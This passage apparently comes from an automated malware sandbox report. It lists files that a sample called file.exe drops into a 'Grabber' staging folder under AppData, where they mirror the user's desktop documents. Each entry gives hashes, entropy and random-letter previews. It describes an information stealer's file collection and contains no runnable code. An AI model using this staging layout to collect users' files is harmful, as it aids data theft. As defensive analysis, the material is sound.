                                                                                                                                                            Preview:PWZOQIFCANBQJPWANKEGOVMEWCFFLEMZUVJQOAQAXGCTWZTWYUTVQQWHVDWHRFTNLRYVNIIZGTGOYHBWUXFUJYWYCZRMHOWCZUBHGWNSMDGQIDGAHRDCIIAVORACBTBRHJNIBWQWQCOIRDJVGLMDNVRGTPPKQFQIFZZUCPJOKPUOXSLQIOBEKHODJTILUMNILLOSWDYCRTPWNPHXZSIAIJKAJTPYTYBSZZXRMUJHEQKDIDPVCZFDCTZVNAOYHSQJIJCWEYINXRRNANLPHUEMCLBTQNKFXRNDFJSUGZSSZUNTRNIONZRKWLCPJJQIACLJRBWZWPPPYJBUFAPIIHMQCTYHBSEEDXNTHPLWQREXFJXBUHCFLIGJQMAKBUMLPAYETALQAGUXNUAYOOFWKCXOAFADMANFEKSMOMEUZZFFPVSMHLOYRHXJRRAJALQVRIPUMMCCTGEVBPFLMLHCUGHBKDAURARQMEAWSQWOEBWEPWRBOUUAYHFAMWPSLAHUCSHDTXVLAVOAPCJJOBGMTOASVLNTADXOSSNCBIQVQFWDQSOVWWEBSZHOUAWBRJTVEBGJZEWIEYONXLCRVUQSPXKKPFJIUUWJMLGZBROUKKZUPWGOUIGYNFESGKBBHDAQFXCOZMLVFRUCCOPOYCHAFADUTZZFJYKNDQVJBTYSEVUHBFRNMKFNLBLTGEBDFOSOUEGYXVCXFUPTCVGNVFDGPBRNRCMUVADFIZDQITOTSQQNGGDMNJWJTVAKLEFUUJBLMKOVXJNLWUOGSIVLILHQAZSXDLYYVDPHGSRAAYZOADQUOKQJOANLTVTRHVTUTVJTLAQTNSTQOAIWGJAUNLGKTGFSZYKOTDQQLCHNAGGJECKGDNKFKBCFITQOVNMOIZLXAGNUBDQXAGJBSLDBFKOBLLWCHJAPFBBKFXQCXWXHIIQWQFYRIZJGDPOSSOCUECDWDQBRDSTMSCNGFBWWIQKBSVUPZMODDPXNVVXBEEMTHIHG

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\SNIPGPPREP\SNIPGPPREP.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.701796197804446
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                                                                            MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                                                                            SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                                                                            SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                                                                            SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\SNIPGPPREP\UBVUNTSCZJ.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:HIT archive data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.680710927136183
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:VYQPeqnSuHRl1G4WOFR8oWZjan0aoAqQ0TSudRWA9qAGD0:VYQPXRl1FWOr89xN0qQwS2b40
                                                                                                                                                            MD5:C638B1D291F5DDC3F5007F5E51345CB1
                                                                                                                                                            SHA1:56AEE241589380F48AADB1A7EA88D0C68BE9FF9F
                                                                                                                                                            SHA-256:A6AE84E0618A8785E1B92D24489E69607A71DD3FC657FBD4EBACEA00B33A71B5
                                                                                                                                                            SHA-512:289AEE36191CE86D62B38B0253B42AEB732F66A58C57F990B48F45F21F280F355C52A3690129DC1CE5EA039D7A854C8AD63D8A8F3B83752031610332785DDF5B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:UBVUNTSCZJAGLEGJZLCTIUQFFTUXDGDMZJQSDGEUEZOCBPGJSTOXKFSFTPIFBIKUDFGJYNMGAHDLCCBOEEEUNDVTZSSGPULUJZCBRUSSRMTLDUGQOQKVROLRJDHOOHJXMEPMNZDGEBDTTAEAEJCKLRVWCOLIIJKXJVGJTDGTJTMJYRSSCFIUBQJSAAGFSLSZFDVWSBSLSFWVWAKIVRABMEABTSRVNHFAUBQVUKUGKOQLXKMVCHWOENBPZIRFFNIBJHBXJZOSTOJMCOMWJYXIRUTOLTBLVSGVAMTJXLCOKCNQALOCPGXTFQAUQFHGAFMBLBVZARLSUCFPEKPDNIIKVYFFALFRMJLPBOIYAEBYGDKMJWVNVCRRTIKWLRPMCWOUQYNZOVRXJZGIBNPUIZVGCFNRVDQJDBZFWNUPAIOVWPSTJPYIFRJEDQXOLNJKZEAKFGCQRFEAEDDTSLANTRTDUFPLZDAQZOEVHBNZBBOWVCJGOJGEENCESIPRLRHJPSJIDZFYFGWBOICBDBARPMJSJVKIRCJDUJTBZDQZSLZRQKLHJNARCATMJTIPRCDTICNCOVWFMTNAMXVKTRCGVRUZXEVVHOCRAMANXYNIATUBIPWGEUAHFOMUVYGSTOPSLYTHFQUZOVARZTTQMZZBFBISOCNEJQIQSHCEZDLCZJBWBPRTPVBULQLKPGBGVXXCAGMQMEWMWVFLTSOIUMKMOXXERANPKKZPXOUEIVBROTGGTVGPVNCXLBBDDBNPFYMAIQENYNXZZSQFDAUBTFLXQZBZOZJSXPYCMWYGTDJCCAJAFDJAKNRUMREQFHKKODROXTZNQKVVBMBOOWUVFRPNRVIHZNACJEUFOKBTDDOXQDLEZIOORSUQSNIXNUGQEZKRSOOHNEWSDAYASMDNIPWCATAIQUBESVNNUPBTFENKJJSJCRPLNTTZSXPLFTUDGBIUBNBEEDWADWKLFZRQSZCOUAERIXPFMGENDQBPODGLAHCD

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\UBVUNTSCZJ.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:HIT archive data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.680710927136183
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:VYQPeqnSuHRl1G4WOFR8oWZjan0aoAqQ0TSudRWA9qAGD0:VYQPXRl1FWOr89xN0qQwS2b40
                                                                                                                                                            MD5:C638B1D291F5DDC3F5007F5E51345CB1
                                                                                                                                                            SHA1:56AEE241589380F48AADB1A7EA88D0C68BE9FF9F
                                                                                                                                                            SHA-256:A6AE84E0618A8785E1B92D24489E69607A71DD3FC657FBD4EBACEA00B33A71B5
                                                                                                                                                            SHA-512:289AEE36191CE86D62B38B0253B42AEB732F66A58C57F990B48F45F21F280F355C52A3690129DC1CE5EA039D7A854C8AD63D8A8F3B83752031610332785DDF5B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:UBVUNTSCZJAGLEGJZLCTIUQFFTUXDGDMZJQSDGEUEZOCBPGJSTOXKFSFTPIFBIKUDFGJYNMGAHDLCCBOEEEUNDVTZSSGPULUJZCBRUSSRMTLDUGQOQKVROLRJDHOOHJXMEPMNZDGEBDTTAEAEJCKLRVWCOLIIJKXJVGJTDGTJTMJYRSSCFIUBQJSAAGFSLSZFDVWSBSLSFWVWAKIVRABMEABTSRVNHFAUBQVUKUGKOQLXKMVCHWOENBPZIRFFNIBJHBXJZOSTOJMCOMWJYXIRUTOLTBLVSGVAMTJXLCOKCNQALOCPGXTFQAUQFHGAFMBLBVZARLSUCFPEKPDNIIKVYFFALFRMJLPBOIYAEBYGDKMJWVNVCRRTIKWLRPMCWOUQYNZOVRXJZGIBNPUIZVGCFNRVDQJDBZFWNUPAIOVWPSTJPYIFRJEDQXOLNJKZEAKFGCQRFEAEDDTSLANTRTDUFPLZDAQZOEVHBNZBBOWVCJGOJGEENCESIPRLRHJPSJIDZFYFGWBOICBDBARPMJSJVKIRCJDUJTBZDQZSLZRQKLHJNARCATMJTIPRCDTICNCOVWFMTNAMXVKTRCGVRUZXEVVHOCRAMANXYNIATUBIPWGEUAHFOMUVYGSTOPSLYTHFQUZOVARZTTQMZZBFBISOCNEJQIQSHCEZDLCZJBWBPRTPVBULQLKPGBGVXXCAGMQMEWMWVFLTSOIUMKMOXXERANPKKZPXOUEIVBROTGGTVGPVNCXLBBDDBNPFYMAIQENYNXZZSQFDAUBTFLXQZBZOZJSXPYCMWYGTDJCCAJAFDJAKNRUMREQFHKKODROXTZNQKVVBMBOOWUVFRPNRVIHZNACJEUFOKBTDDOXQDLEZIOORSUQSNIXNUGQEZKRSOOHNEWSDAYASMDNIPWCATAIQUBESVNNUPBTFENKJJSJCRPLNTTZSXPLFTUDGBIUBNBEEDWADWKLFZRQSZCOUAERIXPFMGENDQBPODGLAHCD

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\VWDFPKGDUF.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.696835919052288
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                                                                                            MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                                                                                            SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                                                                                            SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                                                                                            SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:VWDFPKGDUFQFRUPAPPQGIIRLBMRJVLIMQXSWPKBCUGCSOYPXVZRYABCFRPGQFBKSRNNBPWCDTZQKOZTHEOXCUIMHAWUSAMNXIIEPWHBTSEWOJOEJUQZAZDGIRHLRLOCXDMGTXDXEJOWMXIFWDAGYCVGTBKYMXDYOTCGCARASSUUCMCNKFTCZOAQXBNILJTUOLCZYYUZFHGWFTCHDXYTZOEGFUAJLGZANLVNEVWHIIIRSURMEOTZWVHRLOGMTVRWICZIENOPRWLNSVHXQMULNZLBRICRJVVBJMJGVHJSCKBXVMICMFJQQTCIUSXRLUSMTSWGCQDGVFRQVIURPCVBLZIFEZKBUZGKUJIZAWRLYVVXWFGKCMRQFIVHFVXBDHBEKOJAILQRRTZPUTWBVRNRLZEMFWWBQUGOQWYUEGPKIVHQJHQHSJWVVENNMOAHFXILPEJPHZOQMAVSUXBQQEJFNFIKFQWEWEPKTIQQETBFSABZAOBVXEBARHKLVLMCAFGXXBLNGBZRJQOGMNGDAODYAVKYTFOYJRZDLZIYWZNRPPVZNHCTKOIHMETIQDHDGBHUSSZDLEXZSKRZLTIUMEADMONDOIPXWOAELAEUEJDZBECSINHBJNAYCCYTMEJUWYDNJDACYHUQIQZZBMKKRCJDQSGEHBSIIWWFOPRPYXHWNRLQFZPXUQSZHWHJGRVRNYZBBQUFKAWZTIDUQSFTJJPUAKBRGABJCNWDXOUPLCRZTCKKHIKTYZOGNWDCTUTSDFJLIDJMCLEXGJRUQRWREGZISCYJSMOFQXYMCGMMJMSQASADRKRHYGUYLIBJAAJOTHXHEVLCQEGGJBJBKULCPBXSIOOIEJPQIXDQHKAQSQMLWOISQZQTMTCLGTEHDXRHOIVIVQGKJJACQWPPTBGGHHKJRRPRENADLUPCMGIERRBDQYQJFUSIHVYGVGSIQZZWUZLCSUBMKCQYKCYTJRNNKEZZWFQMXWYFKKWAXFIFRJZTE

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\VWDFPKGDUF\HQJBRDYKDE.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.691179545447335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                            MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                            SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
                                                                                                                                                            SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                            SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\VWDFPKGDUF\QFAPOWPAFG.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.690474000177721
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
                                                                                                                                                            MD5:A01E6B89B2F69F2DA25CB28751A6261C
                                                                                                                                                            SHA1:48C11C0BECEB053F3DB16EC43135B20360E77E9B
                                                                                                                                                            SHA-256:0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
                                                                                                                                                            SHA-512:1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\VWDFPKGDUF\SNIPGPPREP.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.701796197804446
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                                                                            MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                                                                            SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                                                                            SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                                                                            SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\VWDFPKGDUF\VWDFPKGDUF.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.696835919052288
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                                                                                            MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                                                                                            SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                                                                                            SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                                                                                            SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:VWDFPKGDUFQFRUPAPPQGIIRLBMRJVLIMQXSWPKBCUGCSOYPXVZRYABCFRPGQFBKSRNNBPWCDTZQKOZTHEOXCUIMHAWUSAMNXIIEPWHBTSEWOJOEJUQZAZDGIRHLRLOCXDMGTXDXEJOWMXIFWDAGYCVGTBKYMXDYOTCGCARASSUUCMCNKFTCZOAQXBNILJTUOLCZYYUZFHGWFTCHDXYTZOEGFUAJLGZANLVNEVWHIIIRSURMEOTZWVHRLOGMTVRWICZIENOPRWLNSVHXQMULNZLBRICRJVVBJMJGVHJSCKBXVMICMFJQQTCIUSXRLUSMTSWGCQDGVFRQVIURPCVBLZIFEZKBUZGKUJIZAWRLYVVXWFGKCMRQFIVHFVXBDHBEKOJAILQRRTZPUTWBVRNRLZEMFWWBQUGOQWYUEGPKIVHQJHQHSJWVVENNMOAHFXILPEJPHZOQMAVSUXBQQEJFNFIKFQWEWEPKTIQQETBFSABZAOBVXEBARHKLVLMCAFGXXBLNGBZRJQOGMNGDAODYAVKYTFOYJRZDLZIYWZNRPPVZNHCTKOIHMETIQDHDGBHUSSZDLEXZSKRZLTIUMEADMONDOIPXWOAELAEUEJDZBECSINHBJNAYCCYTMEJUWYDNJDACYHUQIQZZBMKKRCJDQSGEHBSIIWWFOPRPYXHWNRLQFZPXUQSZHWHJGRVRNYZBBQUFKAWZTIDUQSFTJJPUAKBRGABJCNWDXOUPLCRZTCKKHIKTYZOGNWDCTUTSDFJLIDJMCLEXGJRUQRWREGZISCYJSMOFQXYMCGMMJMSQASADRKRHYGUYLIBJAAJOTHXHEVLCQEGGJBJBKULCPBXSIOOIEJPQIXDQHKAQSQMLWOISQZQTMTCLGTEHDXRHOIVIVQGKJJACQWPPTBGGHHKJRRPRENADLUPCMGIERRBDQYQJFUSIHVYGVGSIQZZWUZLCSUBMKCQYKCYTJRNNKEZZWFQMXWYFKKWAXFIFRJZTE

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Desktop\VWDFPKGDUF\WSHEJMDVQC.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694142261581685
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                                                                            MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                                                                            SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                                                                            SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                                                                            SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                                                                            Malicious:false
